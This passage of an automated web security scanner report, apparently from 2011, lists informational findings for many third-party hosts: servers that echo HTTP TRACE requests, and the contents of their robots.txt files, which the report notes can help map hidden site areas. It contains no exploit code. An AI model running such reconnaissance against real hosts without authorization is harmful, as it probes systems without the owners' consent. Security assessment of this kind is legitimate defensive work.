Cookie: c374e46f49f3b298

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:00 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.companypond.com
Cookie: c374e46f49f3b298


11.29. http://www.cranberryventurepartners.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cranberryventurepartners.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cranberryventurepartners.com
Cookie: 87b791ea50aba069

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:43:51 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cranberryventurepartners.com
Cookie: 87b791ea50aba069


11.30. http://www.fusionbot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fusionbot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fusionbot.com
Cookie: 681f4ac5b8a2cc2f

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:03:53 GMT
Content-Type: message/http
Content-Length: 71

TRACE / HTTP/1.0
Host: www.fusionbot.com
Cookie: 681f4ac5b8a2cc2f


11.31. https://www.fusionbot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionbot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fusionbot.com
Cookie: 919c32e83b2e862c

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:04:11 GMT
Content-Type: message/http
Content-Length: 71

TRACE / HTTP/1.0
Host: www.fusionbot.com
Cookie: 919c32e83b2e862c


11.32. http://www.opengroup.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.opengroup.org
Cookie: b3fe7613ac709403

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:48:44 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b3fe7613ac709403
Host: www.opengroup.org


11.33. http://www.sti-seoservices.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-seoservices.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sti-seoservices.com
Cookie: dde9f3b4b01ec45f

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:00 GMT
Server: Apache/2.0.63 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sti-seoservices.com
Cookie: dde9f3b4b01ec45f


12. Robots.txt file  previous  next
There are 80 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.



12.1. http://ads.undertone.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /afr.php

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:57:30 GMT
ETag: "54d0005-1a-49cfb05826a80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Sun, 27 Feb 2011 16:44:47 GMT
Connection: close

User-agent: *
Disallow: /

12.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 27 Feb 2011 02:31:36 GMT
Connection: keep-alive

User-agent: *
Disallow: /

12.3. http://api.qwerly.com/v1/facebook/username/someone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.qwerly.com
Path:   /v1/facebook/username/someone

Request

GET /robots.txt HTTP/1.0
Host: api.qwerly.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
X-Mashery-Responder: proxyworker-eu-i-c76f66b3.mashery.com
Connection: close
Accept-Ranges: bytes
Content-Length: 26
Date: Tue, 01 Mar 2011 02:59:32 GMT
Server: Mashery Proxy

User-agent: *
Disallow:


12.4. http://api.search.live.net/json.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.search.live.net
Path:   /json.aspx

Request

GET /robots.txt HTTP/1.0
Host: api.search.live.net

Response

HTTP/1.0 200 OK
Content-Length: 1698
Content-Type: text/plain
Last-Modified: Mon, 07 Feb 2011 20:04:05 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-Akamai-TestID: 2e62bd0c1862429db7e7ab8f304cc69a
Cache-Control: public, max-age=14652968
Date: Tue, 01 Mar 2011 02:58:45 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

12.5. http://ar.atwola.com/atd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Request

GET /robots.txt HTTP/1.0
Host: ar.atwola.com

Response

HTTP/1.1 200 OK
Expires: Sun, 20 Mar 2011 17:45:14 GMT
Date: Sun, 27 Feb 2011 17:45:14 GMT
Content-Length: 28
Content-Type: text/html

User-agent: *
Disallow: /

12.6. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/size=125x125

Request

GET /robots.txt HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

12.7. http://blog.qwerly.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.qwerly.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: blog.qwerly.com

Response

HTTP/1.1 200 OK
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Cache-Control: public
Last-Modified: Tue, 01 Feb 2011 17:05:11 GMT
ETag: 9b5da51325f1c75325c37cebdcd49892
Expires: Wed, 02 Mar 2011 02:59:15 GMT
Pragma:
Vary: Accept-Encoding
X-Tumblr-Usec: D=71464
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Date: Tue, 01 Mar 2011 02:59:15 GMT
Connection: close

Sitemap: http://blog.qwerly.com/sitemap1.xml

User-agent: *
Disallow: /private
Disallow: /random
Disallow: /day
Crawl-delay: 1


12.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:31:15 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

12.9. http://capgeminicom.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicom.112.2o7.net
Path:   /crossdomain.xml

Request

GET /robots.txt HTTP/1.0
Host: capgeminicom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:16 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "361192-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www374
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

12.10. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545

Request

GET /robots.txt HTTP/1.0
Host: capgeminicomglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:11 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "315153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www19
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

12.11. http://cdn.cloudscan.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.cloudscan.us
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: cdn.cloudscan.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 10 Feb 2011 17:53:56 GMT
Accept-Ranges: bytes
ETag: "2e1217d4bc9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 17:10:25 GMT
Connection: close
Content-Length: 151

User-agent: *
Allow: /
sitemap: http://cdn.cloudscan.us/sitemap.xml
sitemap: http://www.cloudscan.us/www.us.xml
sitemap: http://cloudscan.us/us.xml

12.12. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /robots.txt HTTP/1.0
Host: cdn.widgetserver.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Sun, 27 Feb 2011 16:44:49 GMT
ETag: "39-493c9736bd940"
Last-Modified: Fri, 29 Oct 2010 23:02:21 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 57
Connection: close

User-agent: *
Allow: /syndication/index.html
Disallow: /

12.13. http://cloudscan.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cloudscan.us
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: cloudscan.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 10 Feb 2011 17:53:56 GMT
Accept-Ranges: bytes
ETag: "2e1217d4bc9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 15:35:24 GMT
Connection: close
Content-Length: 151

User-agent: *
Allow: /
sitemap: http://cdn.cloudscan.us/sitemap.xml
sitemap: http://www.cloudscan.us/www.us.xml
sitemap: http://cloudscan.us/us.xml

12.14. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 01 Mar 2011 02:57:49 GMT
Server: Cookie Matcher
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

12.15. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Request

GET /robots.txt HTTP/1.0
Host: code.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Language,Cookie,Referer
Content-Type: text/plain; charset=ISO-8859-1
ETag: "d6024b2de2848b59feb3d62ffb1df32c"
Last-Modified: Sat, 18 Dec 2010 23:18:15 GMT
Date: Sat, 26 Feb 2011 23:10:51 GMT
Expires: Sat, 26 Feb 2011 23:10:51 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=df6fb61182348fea:TM=1298761851:LM=1298761851:S=cS3PpKKa6OoCQTI6; expires=Mon, 25-Feb-2013 23:10:51 GMT; path=/; domain=.google.com
Server: codesite_static_content
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /p/*/issues/csv
Disallow: /p/*/source/diff
Disallow: /a/
Allow: /a/eclipselabs.org/
Allow: /a/apache-extras.org/
Disallow: /a/*/p/*/issues/csv
Disallow: /a/*/p/*/source/diff
Cr
...[SNIP]...

12.16. http://creativecommons.org/licenses/by-sa/2.5/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativecommons.org
Path:   /licenses/by-sa/2.5/

Request

GET /robots.txt HTTP/1.0
Host: creativecommons.org

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Pingback: http://creativecommons.org/xmlrpc.php
Set-Cookie: PHPSESSID=d75adb3597be5fa777c332fc9143767e; path=/
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Length: 24
Date: Sat, 26 Feb 2011 23:11:11 GMT
X-Varnish: 1841709520
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow:

12.17. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 28 Feb 2011 17:51:51 GMT
Connection: close

# go away
User-agent: *
Disallow: /

12.18. http://dev.qwerly.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dev.qwerly.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: dev.qwerly.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: policyref="/w3c/p3p.xml",CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Content-Type: text/plain
Content-Length: 24
ETag: "7c36a6c7"
Date: Tue, 01 Mar 2011 02:58:59 GMT
Server: Mashery Proxy

User-agent: *
Disallow:

12.19. http://developer.klout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.klout.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: developer.klout.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: policyref="/w3c/p3p.xml",CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Content-Type: text/plain
Content-Length: 24
ETag: "7c36a6c7"
Date: Tue, 01 Mar 2011 02:58:13 GMT
Server: Mashery Proxy

User-agent: *
Disallow:

12.20. http://discuss.zoho.com/getCustomFile.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://discuss.zoho.com
Path:   /getCustomFile.do

Request

GET /robots.txt HTTP/1.0
Host: discuss.zoho.com

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=f51e8720-3997-4981-acc3-d60688ee1022; Path=/
Set-Cookie: JSESSIONID=5E09E1A0FBB713A19D0F07768D46C44A; Path=/
ETag: W/"263-1298012926000"
Last-Modified: Fri, 18 Feb 2011 07:08:46 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 263
Date: Tue, 01 Mar 2011 02:01:25 GMT
Server: Apache-Coyote/1.1
Connection: close

# ------------------------------------------
# Zoho -- http://discussions.zoho.com
# Robot Exclusion File -- robots.txt
# Author: Rajaram.I
# Last Updated: 05/10/09
# -------------------------------
...[SNIP]...

12.21. http://drh.img.digitalriver.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /store

Request

GET /robots.txt HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=0+0;age=0;ecid=99364635386,0)
Content-Length: 73
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app50
Accept-Ranges: bytes
Date: Sun, 27 Feb 2011 17:44:50 GMT
Connection: close

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

12.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_4_5_18/StdBanner.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_4_5_18/StdBanner.js

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Sun, 27 Feb 2011 02:31:32 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

12.23. http://duck.co/jsp/i18nConstants.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duck.co
Path:   /jsp/i18nConstants.jsp

Request

GET /robots.txt HTTP/1.0
Host: duck.co

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=469234ae-7b7c-4ec2-b11e-77bfc954c039; Path=/
Set-Cookie: JSESSIONID=D0278F59C16DEE7DF1279BAABFBCE33B; Path=/
ETag: W/"263-1298012926000"
Last-Modified: Fri, 18 Feb 2011 07:08:46 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 263
Date: Tue, 01 Mar 2011 02:01:18 GMT
Server: Apache-Coyote/1.1
Connection: close

# ------------------------------------------
# Zoho -- http://discussions.zoho.com
# Robot Exclusion File -- robots.txt
# Author: Rajaram.I
# Last Updated: 05/10/09
# -------------------------------
...[SNIP]...

12.24. https://duckduckgo.com/e.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

GET /robots.txt HTTP/1.0
Host: duckduckgo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:16:44 GMT
Content-Type: text/plain
Content-Length: 124
Last-Modified: Tue, 11 Jan 2011 11:35:29 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /lite
Disallow: /html

# No search result pages
Disallow: /*?

User-agent: ia_archiver
Disallow: /


12.25. http://edge.quantserve.com/quant.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.quantserve.com
Path:   /quant.js

Request

GET /robots.txt HTTP/1.0
Host: edge.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 28 Feb 2011 02:28:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 27 Feb 2011 02:28:22 GMT
Server: QS

User-agent: *
Disallow: /

12.26. https://event.on24.com/eventRegistration/EventLobbyServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /robots.txt HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:28:52 GMT
Server: Apache
Last-Modified: Fri, 21 Nov 2008 01:10:07 GMT
Accept-Ranges: bytes
Content-Length: 1433
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /clients/
Disallow: /demos/
Disallow: /images/
Disallow: /includes/
Disallow: /interface/
Disallow: /media/
Disallow: /vutils/
Disallow: /custom/
Disallow: /eventManag
...[SNIP]...

12.27. http://forums.winamp.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.winamp.com
Path:   /clientscript/yui/yahoo-dom-event/yahoo-dom-event.js

Request

GET /robots.txt HTTP/1.0
Host: forums.winamp.com

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:29 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 73
Connection: close
Content-Type: text/html

User-agent: msnbot
Disallow: /

User-agent: *
Disallow: /printthread*

12.28. http://go.microsoft.com/fwlink/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Request

GET /robots.txt HTTP/1.0
Host: go.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2005 18:42:43 GMT
Accept-Ranges: bytes
ETag: "a03b9f3726dbc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:10:51 GMT
Connection: keep-alive
Content-Length: 80

# Robots.txt file for http://go.microsoft.com
#

User-agent: *
Disallow: /

12.29. http://i2.duck.co/i/sports.espn.go.com.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.duck.co
Path:   /i/sports.espn.go.com.ico

Request

GET /robots.txt HTTP/1.0
Host: i2.duck.co

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 01:58:59 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Sat, 06 Nov 2010 18:56:19 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

12.30. http://jigsaw.w3.org/css-validator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jigsaw.w3.org
Path:   /css-validator/

Request

GET /robots.txt HTTP/1.0
Host: jigsaw.w3.org

Response

HTTP/1.1 200 OK
Connection: keep-alive,close
Date: Sat, 26 Feb 2011 23:10:50 GMT
Content-Length: 403
Content-Type: text/plain
Etag: "m75qsl:122bss69o"
Expires: Mon, 28 Feb 2011 23:10:50 GMT
Last-Modified: Tue, 06 Feb 2007 16:06:17 GMT
Server: Jigsaw/2.3.0-beta2

# sample robots.txt file for Jigsaw

User-agent: *
Disallow: /guest-demos/
Disallow: /status/
Disallow: /demos/
Disallow: /HyperNews/
Disallow: /cgi-bin/
Disallow: /css-validator/docs/
Disallow: /Frie
...[SNIP]...

12.31. http://klout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://klout.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: klout.com

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:07:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 27 Dec 2010 22:55:23 GMT
Accept-Ranges: bytes
Content-Length: 42
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
Disallow: /public

12.32. http://linkhelp.clients.google.com/tbproxy/lh/fixurl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linkhelp.clients.google.com
Path:   /tbproxy/lh/fixurl

Request

GET /robots.txt HTTP/1.0
Host: linkhelp.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 14 Feb 2011 19:41:32 GMT
Date: Sat, 26 Feb 2011 23:12:46 GMT
Expires: Sat, 26 Feb 2011 23:12:46 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

12.33. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Request

GET /robots.txt HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3444467667"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sun, 27 Feb 2011 02:21:19 GMT
Server: HTTP server

User-agent: *
Disallow: /

12.34. https://login.live.com/pp1000/CSS/WEBwhitegray1033.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1000/CSS/WEBwhitegray1033.css

Request

GET /robots.txt HTTP/1.0
Host: login.live.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Sat, 08 Jan 2011 07:07:42 GMT
Accept-Ranges: bytes
ETag: "073d7bd2afcb1:7e9"
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1K31 V: 0
Date: Sun, 27 Feb 2011 19:20:37 GMT
Connection: close

User-agent: *
Disallow:

12.35. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Request

GET /robots.txt HTTP/1.0
Host: maps.gstatic.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 20:46:35 GMT
Date: Mon, 28 Feb 2011 17:01:30 GMT
Expires: Mon, 28 Feb 2011 17:01:30 GMT
Cache-Control: private, max-age=31536000
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

12.36. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networksolutions.112.2o7.net
Path:   /b/ss/netsolglobal/1/H.21.1/s19329686376731

Request

GET /robots.txt HTTP/1.0
Host: networksolutions.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:21 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "e0178-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www623
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

12.37. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 11 Feb 2011 20:36:20 GMT
Accept-Ranges: bytes
ETag: "03ade562bcacb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:00:08 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

12.38. http://o.sa.aol.com/b/ss/aoltechcrunch,aolsvc/1/H.21/s68993670598138  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /b/ss/aoltechcrunch,aolsvc/1/H.21/s68993670598138

Request

GET /robots.txt HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:31:49 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "111e1-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www66
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

12.39. http://qwerly.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qwerly.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: qwerly.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 01 Mar 2011 02:08:01 GMT
Content-Type: text/plain
Content-Length: 1346
Last-Modified: Tue, 14 Dec 2010 09:55:44 GMT
Connection: close
Accept-Ranges: bytes

# Notice: if you have been excluded (everyone but Google, Yahoo and Bing)
